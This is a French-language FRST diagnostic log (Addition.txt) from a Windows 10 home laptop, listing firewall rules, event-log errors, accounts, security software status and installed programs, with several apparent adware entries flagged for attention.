HKU\S-1-5-21-2442018056-4287239082-1881538495-1001\...\StartupApproved\Run: => "DVSSkypeRecorder"
HKU\S-1-5-21-2442018056-4287239082-1881538495-1001\...\StartupApproved\Run: => "IncrediMail"
HKU\S-1-5-21-2442018056-4287239082-1881538495-1001\...\StartupApproved\Run: => "Viber"
==================== RèglesPare-feu (Avec liste blanche) ===============
(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)
FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [{EAA16094-1F14-4988-A478-2B926BC47D86}] => (Allow) C:\Program Files (x86)\IncrediMail\Bin\ImApp.exe
FirewallRules: [{F9BC83C1-1CC3-467C-8934-55378BDA8ECD}] => (Allow) C:\Program Files (x86)\IncrediMail\Bin\ImApp.exe
FirewallRules: [{D2C2AC86-DDB8-46F1-9FD2-1A8FCFD6935B}] => (Allow) C:\Program Files (x86)\IncrediMail\Bin\IncMail.exe
FirewallRules: [{70E8E75F-8868-44FE-9A46-A97B2C054903}] => (Allow) C:\Program Files (x86)\IncrediMail\Bin\IncMail.exe
FirewallRules: [UDP Query User{47C79850-E483-49C7-B965-24B203B921AB}C:\program files (x86)\wolfenstein the new order\wolfneworder_x64.exe] => (Allow) C:\program files (x86)\wolfenstein the new order\wolfneworder_x64.exe
FirewallRules: [TCP Query User{AB1EADC3-FBC0-41C2-923B-D2D0433F37FC}C:\program files (x86)\wolfenstein the new order\wolfneworder_x64.exe] => (Allow) C:\program files (x86)\wolfenstein the new order\wolfneworder_x64.exe
FirewallRules: [UDP Query User{A1460159-903F-4892-BA30-FE33CAD5EFE1}C:\program files\vuze\azureus.exe] => (Block) C:\program files\vuze\azureus.exe
FirewallRules: [TCP Query User{0F7947F0-53A1-4A5C-AFEB-F7BD34A22D1F}C:\program files\vuze\azureus.exe] => (Block) C:\program files\vuze\azureus.exe
FirewallRules: [UDP Query User{B8ADD38B-D3AF-4672-A1DF-010C16C593F0}C:\program files (x86)\activision\call of duty black ops ii\t6sp.exe] => (Allow) C:\program files (x86)\activision\call of duty black ops ii\t6sp.exe
FirewallRules: [TCP Query User{9E00C281-855B-4885-B46B-0A2BB1AF62A7}C:\program files (x86)\activision\call of duty black ops ii\t6sp.exe] => (Allow) C:\program files (x86)\activision\call of duty black ops ii\t6sp.exe
FirewallRules: [{A83ADCB4-183C-49D2-A729-F4B9BCECCDFE}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{A1A4E17B-6D1C-4205-A35D-3DDE93324764}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [UDP Query User{5F13379C-E318-43DA-802A-86F7ECB0B43E}C:\program files (x86)\activision\call of duty black ops ii\t6mp.exe] => (Allow) C:\program files (x86)\activision\call of duty black ops ii\t6mp.exe
FirewallRules: [TCP Query User{99FF6AC5-D665-45F2-B7FA-692A6AC81006}C:\program files (x86)\activision\call of duty black ops ii\t6mp.exe] => (Allow) C:\program files (x86)\activision\call of duty black ops ii\t6mp.exe
FirewallRules: [{D48F6F7F-BD46-41F0-BD6B-37F58504FF32}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{400AD69D-C434-4D5A-A161-9D9CDED9297C}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{E5F86C91-7F3B-4057-9D44-8394BCFA6B3E}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{1DF701CD-1CC2-4086-9A61-5763E52CA094}] => (Allow) C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe
FirewallRules: [{6A9E7764-5922-4C3D-B4E5-2B4F8773BF88}] => (Allow) C:\Program Files\Microsoft Office\Office15\lync.exe
FirewallRules: [{455BB0AE-1258-4DCA-8C71-90DC740C5CEE}] => (Allow) C:\Program Files\Microsoft Office\Office15\lync.exe
FirewallRules: [{6AE54166-2AD1-4980-B819-1892EF836922}] => (Allow) C:\Program Files\Microsoft Office\Office15\UcMapi.exe
FirewallRules: [{3A672DA9-9C33-49EB-ABFB-08A86217710F}] => (Allow) C:\Program Files\Microsoft Office\Office15\UcMapi.exe
FirewallRules: [{9F55C755-3C12-4F27-ABFB-AFCD93E32DCB}] => (Allow) C:\Program Files\Vuze\Azureus.exe
FirewallRules: [{68FA0273-BFCA-42CB-B8DF-FF18D00606E9}] => (Allow) C:\Program Files\Vuze\Azureus.exe
FirewallRules: [{9627186B-25B5-4CE6-83C2-5E5B13F663C7}] => (Allow) C:\Program Files (x86)\IncrediMail\Bin\IncMail.exe
FirewallRules: [{FF0E6C3F-ECA0-44AC-BD88-33F873DC55D8}] => (Allow) C:\Program Files (x86)\IncrediMail\Bin\IncMail.exe
FirewallRules: [{7AB87EB7-A122-4155-9E26-E726535482C4}] => (Allow) C:\Program Files (x86)\IncrediMail\Bin\ImApp.exe
FirewallRules: [{035C7EAB-50F2-496F-862D-5BA698759899}] => (Allow) C:\Program Files (x86)\IncrediMail\Bin\ImApp.exe
FirewallRules: [{F9AE7B9F-BDB3-4FA8-B4D2-4D7A9A2C46C4}] => (Allow) C:\Program Files (x86)\IncrediMail\Bin\ImpCnt.exe
FirewallRules: [{C4C2FCAA-FD53-4382-9CFF-13FE9B0A2B2B}] => (Allow) C:\Program Files (x86)\IncrediMail\Bin\ImpCnt.exe
FirewallRules: [{2167CEB6-FEE6-4E10-A34E-E07111CA155A}] => (Allow) C:\Program Files (x86)\IncrediMail\Bin\ImpCnt.exe
FirewallRules: [{97869EF8-0AF8-45B2-BFA0-E47A6952820A}] => (Allow) C:\Program Files (x86)\IncrediMail\Bin\ImpCnt.exe
FirewallRules: [{17B5A5E7-A332-46CA-9738-DECDF6CF0FD7}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{8D127F4E-D4F9-4C51-9F78-482152080C46}] => (Allow) C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe
FirewallRules: [{991FA9E3-BEE5-482A-800F-1E8AE09EB29D}] => (Allow) C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe
FirewallRules: [TCP Query User{5CDABFA4-BDA7-48F8-B184-07C4216C319F}C:\program files (x86)\murdered soul suspect\binaries\win64\murdered.exe] => (Allow) C:\program files (x86)\murdered soul suspect\binaries\win64\murdered.exe
FirewallRules: [UDP Query User{B21646E7-217E-4CD9-AB6F-689F025356F1}C:\program files (x86)\murdered soul suspect\binaries\win64\murdered.exe] => (Allow) C:\program files (x86)\murdered soul suspect\binaries\win64\murdered.exe
FirewallRules: [{51A6B5AF-ADF2-455C-AF09-D68370ABDB76}] => (Allow) C:\Users\leon\AppData\Roaming\UPUpdata\download\MiniThunderPlatform.exe
FirewallRules: [{3059FE89-9459-4628-BB2B-711E5022FC05}] => (Allow) C:\Users\leon\AppData\Roaming\UPUpdata\download\MiniThunderPlatform.exe
FirewallRules: [{B6E6A3B3-5ABD-4B13-8F9B-AE5D82F39223}] => (Allow) C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe
FirewallRules: [{96AFC04F-79C7-4E79-96DE-B31D2F618B20}] => (Allow) C:\Program Files (x86)\UCBrowser\Application\Downloader\download\MiniThunderPlatform.exe
FirewallRules: [{B5C1E4DC-0398-4F81-B7F4-4369AC35147A}] => (Allow) C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe
FirewallRules: [{32B7A664-758E-4A7A-9F6C-ED5FE220CBEB}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{11296EC4-F832-45BB-B478-D14CD830A308}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{AEB73EE9-C3AB-420C-AD7D-823B1A6F2259}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{155320AB-37A7-409D-8C52-890060698172}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
==================== Points de restauration =========================
20-04-2016 18:09:20 Point de contrôle planifié
24-04-2016 08:20:30 Opération de restauration
==================== Éléments en erreur du Gestionnaire de périphériques =============
==================== Erreurs du Journal des événements: =========================
Erreurs Application:
==================
Error: (04/26/2016 08:16:59 AM) (Source: Office 2013 Licensing Service) (EventID: 0) (User: )
Description: Subscription licensing service failed: -1073418154
Error: (04/25/2016 10:42:03 PM) (Source: DptfEvent) (EventID: 1) (User: )
Description: DptfParticipantDisplayService
GetDisplayBrightnessFromPowerSettings: Could not inform driver of current brightness value.
Error: (04/25/2016 10:42:03 PM) (Source: DptfEvent) (EventID: 1) (User: )
Description: DptfParticipantDisplayService
SetBrightnessSettingInDriver: p_handle is NULL.
Error: (04/25/2016 10:42:03 PM) (Source: DptfEvent) (EventID: 1) (User: )
Description: DptfParticipantDisplayService
SetDisplayBrightnessViaPowerSettings: Could not obtain brightness value to set from driver.
Error: (04/25/2016 10:42:03 PM) (Source: DptfEvent) (EventID: 1) (User: )
Description: DptfParticipantDisplayService
GetBrightnessSettingFromDriver: p_handle is NULL.
Error: (04/25/2016 10:42:03 PM) (Source: DptfEvent) (EventID: 2) (User: )
Description: DptfParticipantDisplayService
ConnectToDptfDisplayDriver: SetupDiEnumDeviceInterfaces() failed.
Last error = [0x00000103]
Error: (04/25/2016 10:16:04 PM) (Source: Office 2013 Licensing Service) (EventID: 0) (User: )
Description: Subscription licensing service failed: -1073418154
Error: (04/25/2016 10:12:17 PM) (Source: Perflib) (EventID: 1023) (User: )
Description: rdyboost4
Error: (04/25/2016 10:04:15 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nom de l’application défaillante nw.exe, version : 0.0.0.0, horodatage : 0x55b872f9
Nom du module défaillant : nw.exe, version : 0.0.0.0, horodatage : 0x55b872f9
Code d’exception : 0x80000003
Décalage d’erreur : 0x000edd29
ID du processus défaillant : 0x1b64
Heure de début de l’application défaillante : 0xnw.exe0
Chemin d’accès de l’application défaillante : nw.exe1
Chemin d’accès du module défaillant: nw.exe2
ID de rapport : nw.exe3
Nom complet du package défaillant : nw.exe4
ID de l’application relative au package défaillant : nw.exe5
Error: (04/25/2016 10:02:58 PM) (Source: DptfEvent) (EventID: 1) (User: )
Description: DptfParticipantDisplayService
GetDisplayBrightnessFromPowerSettings: Could not inform driver of current brightness value.
Erreurs système:
=============
Error: (04/26/2016 08:15:27 AM) (Source: DCOM) (EventID: 10016) (User: AUTORITE NT)
Description: propres à l’applicationLocalActivation{3185A766-B338-11E4-A71E-12E3F512A338}{7006698D-2974-4091-A424-85DD0B909E23}AUTORITE NTSERVICE RÉSEAUS-1-5-20LocalHost (avec LRPC)Non disponibleNon disponible
Error: (04/26/2016 08:10:49 AM) (Source: DCOM) (EventID: 10016) (User: VICTOR)
Description: par défaut de l’ordinateurLocalActivation{C2F03A33-21F5-47FA-B4BB-156362A2F239}{316CDED5-E4AE-4B15-9113-7055D84DCC97}victorleonS-1-5-21-2442018056-4287239082-1881538495-1001LocalHost (avec LRPC)Microsoft.WindowsStore_2016.29.13.0_x64__8wekyb3d8bbweS-1-15-2-1609473798-1231923017-684268153-4268514328-882773646-2760585773-1760938157
Error: (04/26/2016 08:10:24 AM) (Source: DCOM) (EventID: 10010) (User: AUTORITE NT)
Description: {784E29F4-5EBE-4279-9948-1E8FE941646D}
Error: (04/26/2016 12:05:27 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Le service Accès aux données utilisateur_65bee s’est terminé de manière inattendue. Ceci s’est produit 1 fois. L’action corrective suivante va être effectuée dans 10000 millisecondes : Redémarrer le service.
Error: (04/26/2016 12:05:27 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Le service Stockage des données utilisateur_65bee s’est terminé de manière inattendue. Ceci s’est produit 1 fois. L’action corrective suivante va être effectuée dans 10000 millisecondes : Redémarrer le service.
Error: (04/26/2016 12:05:27 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Le service Données de contacts_65bee s’est terminé de manière inattendue. Ceci s’est produit 1 fois. L’action corrective suivante va être effectuée dans 10000 millisecondes : Redémarrer le service.
Error: (04/26/2016 12:05:27 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Le service Hôte de synchronisation_65bee s’est terminé de manière inattendue. Ceci s’est produit 1 fois. L’action corrective suivante va être effectuée dans 10000 millisecondes : Redémarrer le service.
Error: (04/26/2016 12:05:27 AM) (Source: DCOM) (EventID: 10016) (User: AUTORITE NT)
Description: propres à l’applicationLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}AUTORITE NTSystèmeS-1-5-18LocalHost (avec LRPC)Non disponibleNon disponible
Error: (04/25/2016 10:56:53 PM) (Source: DCOM) (EventID: 10016) (User: AUTORITE NT)
Description: propres à l’applicationLocalActivation{3185A766-B338-11E4-A71E-12E3F512A338}{7006698D-2974-4091-A424-85DD0B909E23}AUTORITE NTSERVICE RÉSEAUS-1-5-20LocalHost (avec LRPC)Non disponibleNon disponible
Error: (04/25/2016 10:46:03 PM) (Source: DCOM) (EventID: 10010) (User: AUTORITE NT)
Description: {784E29F4-5EBE-4279-9948-1E8FE941646D}
CodeIntegrity:
===================================
Date: 2016-04-25 22:01:13.005
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
Date: 2016-04-25 16:32:15.917
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
Date: 2016-04-24 15:48:32.777
Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume4\Windows\System32\nvinitx.dll that did not meet the Custom 3 / Antimalware signing level requirements.
Date: 2016-04-24 15:48:32.717
Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume4\Program Files\Common Files\microsoft shared\OFFICE15\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.
Date: 2016-04-24 13:34:42.504
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
Date: 2016-04-24 00:50:01.615
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
Date: 2016-04-22 10:08:37.557
Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume4\Windows\System32\nvinitx.dll that did not meet the Custom 3 / Antimalware signing level requirements.
Date: 2016-04-22 10:08:37.462
Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume4\Program Files\Common Files\microsoft shared\OFFICE15\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.
Date: 2016-04-19 07:52:50.445
Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume4\Windows\System32\nvinitx.dll that did not meet the Custom 3 / Antimalware signing level requirements.
Date: 2016-04-19 07:52:50.366
Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume4\Program Files\Common Files\microsoft shared\OFFICE15\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.
==================== Infos Mémoire ===========================
Processeur: Intel(R) Core(TM) i5-4210U CPU @ 1.70GHz
Pourcentage de mémoire utilisée: 36%
Mémoire physique - RAM - totale: 8075.26 MB
Mémoire physique - RAM - disponible: 5113.41 MB
Mémoire virtuelle totale: 9355.26 MB
Mémoire virtuelle disponible: 6208.64 MB
==================== Lecteurs ================================
Drive c: (OS) (Fixed) (Total:372.6 GB) (Free:238.91 GB) NTFS ==>[système avec composants d'amorçage (obtenu depuis lecteur)]
Drive d: (Data) (Fixed) (Total:542.8 GB) (Free:277.22 GB) NTFS
==================== MBR & Table des partitions ==================
========================================================
Disk: 0 (Size: 931.5 GB) (Disk ID: 1B8C5F82)
Partition: GPT.
==================== Fin de Addition.txt ============================
Exécuté par leon (2016-04-26 08:28:15)
Exécuté depuis C:\Users\leon\Downloads\Logiciel
Windows 10 Home Version 1511 (X64) (2016-02-28 16:04:57)
Mode d'amorçage: Normal
==========================================================
==================== Comptes: =============================
Administrateur (S-1-5-21-2442018056-4287239082-1881538495-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-2442018056-4287239082-1881538495-503 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-2442018056-4287239082-1881538495-1003 - Limited - Enabled)
Invité (S-1-5-21-2442018056-4287239082-1881538495-501 - Limited - Disabled)
leon (S-1-5-21-2442018056-4287239082-1881538495-1001 - Administrator - Enabled) => C:\Users\leon
==================== Centre de sécurité ========================
(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé.)
AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: Protection antivirus et antispyware McAfee (Disabled - Up to date) {DA9F8ED0-D0DE-39CC-F55A-51AB4CC1B556}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Protection antivirus et antispyware McAfee (Disabled - Up to date) {61FE6F34-F6E4-3642-CFEA-6AD93746FFEB}
FW: Pare-feu McAfee (Disabled) {E2A40FF5-9AB1-3894-DE05-F89EB212F22D}
==================== Programmes installés ======================
(Seuls les logiciels publicitaires ('adware') avec la marque 'caché' ('Hidden') sont susceptibles d'être ajoutés au fichier fixlist.txt pour qu'ils ne soient plus masqués. Les programmes publicitaires devront être désinstallés manuellement.)
7-Zip 4.32 (HKLM-x32\...\7-Zip) (Version: - )
Adblock Plus pour IE (32-bits et 64-bits) (HKLM\...\{1C9A24E0-CA21-414D-8D21-22BF8981FC9F}) (Version: 1.5 - Eyeo GmbH)
Archiveur WinRAR (HKLM-x32\...\WinRAR archiver) (Version: - )
ASUS Live Update (HKLM-x32\...\{FA540E67-095C-4A1B-97BA-4D547DEC9AF4}) (Version: 3.2.9 - ASUS)
ASUS Screen Saver (HKLM-x32\...\{0FBEEDF8-30FA-4FA3-B31F-C9C7E7E8DFA2}) (Version: 1.0.3 - ASUS)
ASUS Smart Gesture (HKLM-x32\...\{4D3286A6-F6AB-498A-82A4-E4F040529F3D}) (Version: 4.0.5 - ASUS)
ASUS Splendid Video Enhancement Technology (HKLM-x32\...\{0969AF05-4FF6-4C00-9406-43599238DE0D}) (Version: 3.01.0003 - ASUS)
ASUS USB Charger Plus (HKLM-x32\...\{A859E3E5-C62F-4BFA-AF1D-2B95E03166AF}) (Version: 3.1.9 - ASUS)
ATK Package (HKLM-x32\...\{AB5C933E-5C7D-4D30-B314-9C83A49B94BE}) (Version: 1.0.0036 - ASUS)
AviSynth 2.5 (HKLM-x32\...\AviSynth) (Version: - )
Belgium e-ID middleware 4.1.13 (build 1717) (HKLM\...\{DB942AEA-93D6-4FE4-8862-180D35A71717}) (Version: 4.1.1717 - Belgian Government)
Call of Duty Advanced Warfare (HKLM-x32\...\Call of Duty Advanced Warfare_is1) (Version: - )
Call of Duty Black Ops II (HKLM-x32\...\Call of Duty Black Ops II_is1) (Version: - )
Canon Easy-WebPrint EX (HKLM-x32\...\Easy-WebPrint EX) (Version: 1.6.0.0 - Canon Inc.)
Canon IJ Scan Utility (HKLM-x32\...\Canon_IJ_Scan_Utility) (Version: - Canon Inc.)
Canon MG3200 series MP Drivers (HKLM\...\{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_Canon_MG3200_series) (Version: 1.01 - Canon Inc.)
Canon MG3200 series On-screen Manual (HKLM-x32\...\Canon MG3200 series On-screen Manual) (Version: 7.5.0 - Canon Inc.)
Canon My Image Garden (HKLM-x32\...\Canon My Image Garden) (Version: 1.0.0 - Canon Inc.)
Canon My Image Garden Design Files (HKLM-x32\...\Canon My Image Garden Design Files) (Version: 1.0.0 - Canon Inc.)
Canon My Printer (HKLM-x32\...\CanonMyPrinter) (Version: 3.0.0 - Canon Inc.)
Canon Quick Menu (HKLM-x32\...\CanonQuickMenu) (Version: 2.0.0 - Canon Inc.)
CCleaner (HKLM\...\CCleaner) (Version: 5.10 - Piriform)
comoBoss version 1.1 (HKLM-x32\...\comoBoss_is1) (Version: 1.1 - aze) <==== ATTENTION
Device Setup (HKLM-x32\...\{1F07F2C7-596F-4F34-B805-2C61A3E50E5A}) (Version: 1.0.18 - ASUSTek Computer Inc.)
Enregistrement utilisateur de Canon MG3200 series (HKLM-x32\...\Enregistrement utilisateur de Canon MG3200 series) (Version: - Canon Inc.)
Foxit PhantomPDF (HKLM-x32\...\{045A0488-55C1-45B1-9992-4B4134904D61}) (Version: 7.0.59.127 - Foxit Software Inc.)
Free Video Call Recorder for Skype version 1.2.28.713 (HKLM-x32\...\Free Video Call Recorder for Skype_is1) (Version: 1.2.28.713 - DVDVideoSoft Ltd.)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 49.0.2623.112 - Google Inc.)
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.29.5 - Google Inc.) Hidden
hohosearch - Uninstall (HKLM-x32\...\Uninstall - isr) (Version: - )
IncrediMail (x32 Version: 6.3.9.5274 - IncrediMail) Hidden
IncrediMail 2.0 (HKLM-x32\...\IncrediMail) (Version: 6.3.9.5274 - IncrediMail Ltd.)
Intel(R) Dynamic Platform and Thermal Framework (HKLM-x32\...\FFD10ECE-F715-4a86-9BD8-F6F47DA5DA1C) (Version: 7.1.0.2105 - Intel Corporation)
Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 9.6.0.1038 - Intel Corporation)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.3496 - Intel Corporation)
Java 8 Update 77 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218077F0}) (Version: 8.0.770.3 - Oracle Corporation)
Light Image Resizer 4.7.1.1 (HKLM-x32\...\{EBE030DD-D404-4D92-85E9-8C3624820808}_is1) (Version: 4.7.1.1 - ObviousIdea)
maintenance software version 1.0 (HKLM-x32\...\maintenance software_is1) (Version: 1.0 - azec) <==== ATTENTION
McAfee LiveSafe (HKLM-x32\...\MSC) (Version: 14.0.6120 - McAfee, Inc.)
McAfee WebAdvisor (HKLM-x32\...\{35ED3F83-4BDC-4c44-8EC6-6A8301C7413A}) (Version: 4.0.189 - McAfee, Inc.)
Microsoft Office Professionnel Plus 2013 (HKLM\...\Office15.PROPLUS) (Version: 15.0.4569.1506 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Mozilla Firefox 43.0 (x86 fr) (HKLM-x32\...\Mozilla Firefox 43.0 (x86 fr)) (Version: 43.0 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 43.0 - Mozilla)
NVIDIA Graphics Driver 333.02 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 333.02 - NVIDIA Corporation)
NVIDIA PhysX System Software 9.13.1220 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.13.1220 - NVIDIA Corporation)
OpenAL (HKLM-x32\...\OpenAL) (Version: - )
Outils de vérification linguistique 2013 de Microsoft Office - Français (Version: 15.0.4569.1506 - Microsoft Corporation) Hidden
Package de pilotes Windows - ASUS (ATP) Mouse (06/17/2015 6.0.0.66) (HKLM\...\1EFB54678773735560B565BE7FA6F2BCC557EE21) (Version: 06/17/2015 6.0.0.66 - ASUS)
Package de pilotes Windows - Fedict SmartCard (08/08/2015 4.1.5) (HKLM\...\9F46F7AB1E3B1B5F5482EA8D97F401B04FBF7958) (Version: 08/08/2015 4.1.5 - Fedict)
Panneau de configuration NVIDIA 353.54 (Version: 353.54 - NVIDIA Corporation) Hidden
PhotoFiltre 7 (HKU\S-1-5-21-2442018056-4287239082-1881538495-1001\...\PhotoFiltre 7) (Version: - )
PriceFountain (HKU\S-1-5-21-2442018056-4287239082-1881538495-1001\...\PriceFountain) (Version: - ) <==== ATTENTION
Qualcomm Atheros Client Installation Program (HKLM-x32\...\{28006915-2739-4EBE-B5E8-49B25D32EB33}) (Version: 10.0 - Qualcomm Atheros)
Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 6.2.9200.39048 - Realtek Semiconductor Corp.)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 8.33.529.2014 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7535 - Realtek Semiconductor Corp.)
Revo Uninstaller 1.95 (HKLM-x32\...\Revo Uninstaller) (Version: 1.95 - VS Revo Group)
Skype™ 7.22 (HKLM-x32\...\{FC965A47-4839-40CA-B618-18F486F042C6}) (Version: 7.22.109 - Skype Technologies S.A.)
SpyHunter 4 (HKLM-x32\...\SpyHunter) (Version: 4.21.18.4608 - Enigma Software Group, LLC)
Steam (HKLM-x32\...\{048298C9-A4D3-490B-9FF9-AB023A9238F3}) (Version: 1.0.0.0 - Valve Corporation)
TAP-Windows 9.9.2 (HKLM\...\TAP-Windows) (Version: 9.9.2 - )
TomTom HOME (HKLM-x32\...\{5DCB2EB3-87AD-426E-8D74-8B92C9D731C4}) (Version: 2.9.8 - Nom de votre société)
TomTom HOME (HKLM-x32\...\{BB05590A-6602-43F3-A400-77EA0976BC0A}) (Version: 2.9.8 - Nom de votre société)
TomTom HOME Visual Studio Merge Modules (HKLM-x32\...\{8F3C31C5-9C3A-4AA8-8EFA-71290A7AD533}) (Version: 1.0.2 - TomTom International B.V.)
UC浏览器 (HKLM-x32\...\UCBrowser) (Version: 5.6.11815.13 - 广州市动景计算机科技有限公司) <==== ATTENTION
Unity Web Player (HKU\S-1-5-21-2442018056-4287239082-1881538495-1001\...\UnityWebPlayer) (Version: 4.6.6f2 - Unity Technologies ApS)
Update for PriceFountain (HKU\S-1-5-21-2442018056-4287239082-1881538495-1001\...\{01364B9F-BC12-1420-6723-2F8DE4B5D2BD}) (Version: - Update for PriceFountain) <==== ATTENTION
Update Installer for WildTangent Games App (x32 Version: - WildTangent) Hidden
Utatity (HKLM-x32\...\{DF770D61-C0B3-46C9-8FAC-E8B6AE40D44E}) (Version: 1.0.0.0 - " ")
Viber (HKU\S-1-5-21-2442018056-4287239082-1881538495-1001\...\{b1142ab5-4e7c-4fa1-8734-115e5d1e1933}) (Version: 5.4.0.1661 - Viber Media Inc.)
Viber (x32 Version: 5.4.0.1661 - Viber Media Inc.) Hidden
VLC media player (HKLM-x32\...\VLC media player) (Version: 2.2.0 - VideoLAN)
Vuze (HKLM\...\8461-7759-5462-8226) (Version: 5.6.1.2 - Azureus Software, Inc.)
WebStorage (HKLM-x32\...\WebStorage) (Version: 2.1.11.399 - ASUS Cloud Corporation)
WildTangent Games App (HKLM-x32\...\{70B446D1-E03B-4ab0-9B3C-0832142C9AA8}.WildTangent Games App-asus) (Version: 4.0.11.14 - WildTangent)
Windows Driver Package - ASUS (ATP) Mouse (03/18/2014 6.0.0.35) (HKLM\...\DAA6E0EEB715139C1CEA332C78AB4609FB3C211B) (Version: 03/18/2014 6.0.0.35 - ASUS)
WinFlash (HKLM-x32\...\{8F21291E-0444-4B1D-B9F9-4370A73E346D}) (Version: 2.42.0 - ASUS)
WinZip (HKLM-x32\...\WinZip) (Version: 10.0 (7245f) - WinZip Computing LP)
Wolfenstein: The New Order (HKLM-x32\...\V29sZmVuc3RlaW5UaGVOZXdPcmRlcg==_is1) (Version: 1 - )
Zip Key Demo (HKLM-x32\...\Zip Key 6.5 Demo) (Version: - )
==================== Personnalisé CLSID (Avec liste blanche): ==========================
(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)
CustomCLSID: HKU\S-1-5-21-2442018056-4287239082-1881538495-1001_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\localserver32 -> C:\Users\leon\AppData\Local\Microsoft\OneDrive\17.3.6386.0412\FileCoAuth.exe (Microsoft Corporation)
